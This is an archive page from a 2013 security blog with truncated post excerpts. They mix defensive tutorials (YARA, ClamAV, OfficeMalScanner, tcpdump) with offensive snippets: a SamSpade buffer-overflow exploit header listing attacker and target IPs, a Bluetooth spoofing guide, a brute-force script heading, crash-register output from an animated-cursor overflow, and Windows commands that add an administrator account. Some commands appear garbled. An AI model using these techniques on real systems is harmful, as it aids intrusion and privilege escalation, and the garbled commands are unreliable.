Showing posts from 2013

SAMSPADE BUFFER OVERFLOW VULNERABILITY

# Exploit Title: SAMSPADE 1.14 BUFFER OVERFLOW
# Date: 10-12-2013
# Exploit Author: VISHAL MISHRA & NIDHI VERMA
# Vendor Homepage: http://www.samspade.org/
# Software Link: http://www.majorgeeks.com/mg/getmirror/sam_spade,1.html
# Version: 1.1.4 (beta)
# Tested on: WINDOWS XP(sp2)

TARGET: windows xp(sp2)   ip:192.168.117.129
ATTACKER: backtrack       ip:192.168.117.131   PORT:443

Payload:

Spoofing Bluetooth Device Information

Step 1: $ hciconfig
Like ifconfig and iwconfig, hciconfig enumerates the Bluetooth interfaces in a system together with a little information about each card, such as its MAC address, MTU and interface name.

Step 2: $ hciconfig -a hci0
Now we know we have a Bluetooth interface card, hci0 (it may be any of hci0, hci1, etc.). As you can see in the output below, this Bluetooth device is using the OS host name as its own device name. We will change this information so that a person cannot enumerate any info about our Bluetooth device from it.

Class is a 24-bit (6 hex digit) identifier for Bluetooth devices. The class defines which hardware class a Bluetooth device belongs to, e.g. 1) 0x78020c is the class of a phone/smartphone, 2) 0x6e0100 is the class of a computer, etc. Now we will try to change the default class and name of our Bluetooth device.

Step 3: $ hciconfig -a hci0 features
This command will tell what features our card

OfficeMalScanner Tutorial

+------------------------------------------+
|           OfficeMalScanner v0.61         |
|  Frank Boldewin / www.reconstructer.org  |
+------------------------------------------+

Usage:
--------
OfficeMalScanner <PPT, DOC or XLS file> <scan | info> <brute> <debug>

Options:
scan    - scan for several shellcode heuristics and encrypted PE-Files
info    - dumps OLE structures, offsets+length and saves found VB-Macro code
inflate - decompresses Ms Office 2007 documents, e.g. docx, into a temp dir

Switches: (only enabled if option "scan" was selected)
brute - enables the "brute force mode" to find encrypted stuff
debug - prints out disassembly resp hexoutput if a heuristic was found

If you use Ubuntu with Wine on it, type the following command in a terminal to reach a Windows command prompt from which you can run OfficeMalScanner:
   wine cmd.exe

Jsunpack-n Tutorial (Analyzing Malicious Documents)

INSTALLATION:
Required dependencies (all of these are shipped in the jsunpack-n package in a folder named depends):

1) Build and install pynids (nids) from ./depends/pynids-0.6.1.tar.gz
   To compile pynids, you may need the following (Ubuntu) packages: libpcap-dev pkg-config python-dev libgtk2.0-dev libnet1-dev
   To install these packages either use Software Center or run: apt-get install PackageName
   $ cd depends
   $ tar xvfz pynids-0.6.1.tar.gz
   $ cd pynids-0.6.1/
   $ python setup.py build
   $ sudo python setup.py install

2) Build SpiderMonkey 'js' from ./depends/js-1.8.0-rc1-src.tar.gz
   This package has modifications to the SpiderMonkey source code; therefore it is not recommended that you use the default smjs packages. (Details of the modifications are in INSTALL.spidermonkey.shellcode and INSTALL.spidermonkey, for historical purposes.)
   $ cd depends/
   $ tar xvfz js-1.8.0-rc1-src.tar.gz
   $ cd js-1.8.0-rc1-src
   $ mak

Cyberoam Login Brute Force Script

Cyberoam Login
# Cybera

Capture Wireless Traffic

Wireless Frame Format Using Tcpdump

   tcpdump -i <interface> -s 0 -nne 'wlan type <type> subtype <subtype>'

Note: older versions of tcpdump and Wireshark capture filters don't support the "wlan" keyword; just use 'type <type> subtype <subtype>' instead.

Sniffing wireless in monitor mode, ignoring beacons:

   tcpdump -i <interface> -s 0 -nne '(type mgt or type ctl or type data) and (not type mgt subtype beacon)'

type   subtypes
mgt    assoc-req assoc-resp reassoc-req reassoc-resp probe-req probe-resp beacon atim disassoc auth deauth
ctl    ps-poll rts cts ack cf-end cf-end-ack
data   data data-cf-ack data-cf-poll data-cf-ack-poll null cf-ack cf-poll cf-ack-poll qos-data qos-data-cf-ack qos-data-cf-poll qos-data-cf-ack-poll qos qos-cf-poll qos-cf-ack-poll

Wlan Capture Using Wireshark

   wlan.fc.type == 0    Management frames
   wlan.fc.type == 1    Control fram

Microsoft Windows 2000 IIS 5.0 IPP Vulnerability

Exploit Microsoft Windows 2000 IIS 5.0 IPP ISAPI Vulnerability

Install And Configure Yara

Step 1: To install YARA on Ubuntu we need PCRE and some libraries first:
   sudo apt-get install libpcre3 libpcre3-dev
Then download the YARA source code:
   $ wget http://yara-project.googlecode.com/files/yara-1.4.tar.gz
   $ wget http://yara-project.googlecode.com/files/yara-python-1.4.tar.gz

Step 2: Compile and install YARA on your Linux box.
   a) cd yara-1.4
      chmod +x -R /root/Desktop/yara-1.4/*
      ./configure
      make
      make check
      make install
   b) cd ..
      cd yara-python-1.4
      python setup.py install

Step 3: Convert the ClamAV database to YARA using http://code.google.com/p/malwarecookbook/source/browse/trunk/3/3/clamav_to_yara.py?r=5
   sigtool -u /var/lib/clamav/main.cvd                     // decompress the database
   python clamav_to_yara.py -f main.ndb -o clamav.yara     // convert clamav to yara

Step 4: For packer signatures (the PEiD tool uses these signatures to detect the type of packing), go to this site and copy pa

Clamav Tutorial

Install ClamAV And Create Signatures

Step 1: Install ClamAV on Ubuntu by following the simple steps given below:
Edit /etc/apt/sources.list and add a line like this to it:
   deb http://volatile.debian.org/debian-volatile lenny/volatile main contrib non-free
Then run:
   apt-get update && apt-get install clamav
If you need clamd, you may also want to run:
   apt-get install clamav-daemon

Step 2: CVD (ClamAV Virus Database) is a digitally signed container that includes signature databases in various text formats. The header of the container is a 512-byte-long string with colon-separated fields:
   ClamAV-VDB:build time:version:number of signatures:functionality level required:MD5 checksum:digital signature:builder name:build time (sec)
sigtool --info displays detailed information about a given CVD file.

Signature formats:
MD5: The easiest way to create signatures for ClamAV is to use MD5 checksums; however, this method can only be used against static malware. MD5, PE section b

TcpDumpTutorial

When using a tool that displays network traffic in a more natural (raw) way, the burden of analysis is placed directly on the human rather than the application. This approach cultivates continued and elevated understanding of the TCP/IP suite, and for this reason I strongly advocate using tcpdump instead of other tools whenever possible.

A mnemonic for the TCP flags: Unskilled Attackers Pester Real Security Folk (URG, ACK, PSH, RST, SYN, FIN)

Show me all URGENT (URG) packets...
   # tcpdump 'tcp[13] & 32 != 0'
Show me all ACKNOWLEDGE (ACK) packets...
   # tcpdump 'tcp[13] & 16 != 0'
Show me all PUSH (PSH) packets...
   # tcpdump 'tcp[13] & 8 != 0'
Show me all RESET (RST) packets...
   # tcpdump 'tcp[13] & 4 != 0'
Show me all SYNCHRONIZE (SYN) packets...
   # tcpdump 'tcp[13] & 2 != 0'
Show me all FINISH (FIN) packets...
   # tcpdump 'tcp[13]

Rare Windows Commands

1: Find the MAC address of all available interfaces:
   getmac
2: Find the version of the Windows OS:
   ver
3: Find the SID of the current user (another method):
   whoami /user
4: Find system information:
   systeminfo
5: Find the SID of a Windows user:
   wmic useraccount where name='vishal' get sid
6: Find out about the wireless adapter and the access points available around you:
   netsh wlan show all

Different types of Cisco IOS passwords

There are three different types of Cisco IOS passwords.

1) Cisco IOS type 0 passwords
There is a command in Cisco IOS that can be issued to encrypt all passwords in the configuration file. If this command is not entered into the configuration file, then all passwords (except for the enable secret password) will appear as plaintext, as shown below:
   username admin privilege 15 password 0 cisco
From the above line in the Cisco IOS configuration file we can see that in this example the user admin has a password of cisco. The above password is noted as type 0 (zero), as shown by the zero that precedes the actual password. Type 0 passwords use no encryption.

2) Cisco IOS type 7 passwords
The command that is issued to encrypt user passwords is "service password-encryption", and it should be entered from the Cisco router configuration mode prompt. If the "service password-encryption" command is issued, then all type 0 (zero) passwords become encrypted use

Manage User Account In Command Prompt

1) Command to find the available users on a Windows box:
   net user
2) Command to add a new user account with a password:
   net user /add Lenny{username} mango{pass}
3) Command to add a user account to the administrators group:
   net localgroup administrator Lenny /add
4) To give full administrator rights to the user, use the following command:
   net share concfg*C:\/grant:useraccountname,full
5) The following example adds a user account for a user whose full name is Jay Jamison and whose user account name is jayj, with logon rights from 8 A.M. to 5 P.M., Monday through Friday (no spaces in time designations), a mandatory password (Cyk4^g3B), and the user's full name:
   net user jayj Cyk4^g3B /add /passwordreq:yes /times:monday-friday,8am-5pm /fullname:"Jay Jamison"
6) The following example sets the logon time (8 A.M. to 5 P.M.) for Lenny by using 24-hour notation:
   net user Lenny /time:M-F,08:00-17:00
7) The following example set

Animated Cursor Vulnerability Demystified

With GS, DEP, ASLR, and protected mode IE7, it's possible to go ahead and write a functional proof of concept that will work on Vista and XP alike. When triggering the vulnerability on Vista with a complete overwrite of the return address, the register state looks something like this:

   eax=5f36476f ebx=0329f278 ecx=00000000 edx=00000000 esi=0329f1f0 edi=0329f1bc
   eip=41414141 esp=0329f1bc ebp=66ae6c41 iopl=0         nv up ei pl zr na pe nc
   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
   41414141 ??              ???

One important point to note is that our malicious ANI file contains two ANI headers: one is good, i.e. 36 bytes, and the other is the bad one that causes the buffer overflow in the LoadAniIcon function. The first is 36 bytes to make sure it passes the loadCursorIconfromFilemap function, which checks the ANI header; but the problem is that it is called only once for a single file. If another ANI header is encountered, then instead of calling loadCursorIconfromFilemap, the loadAniIcon function will be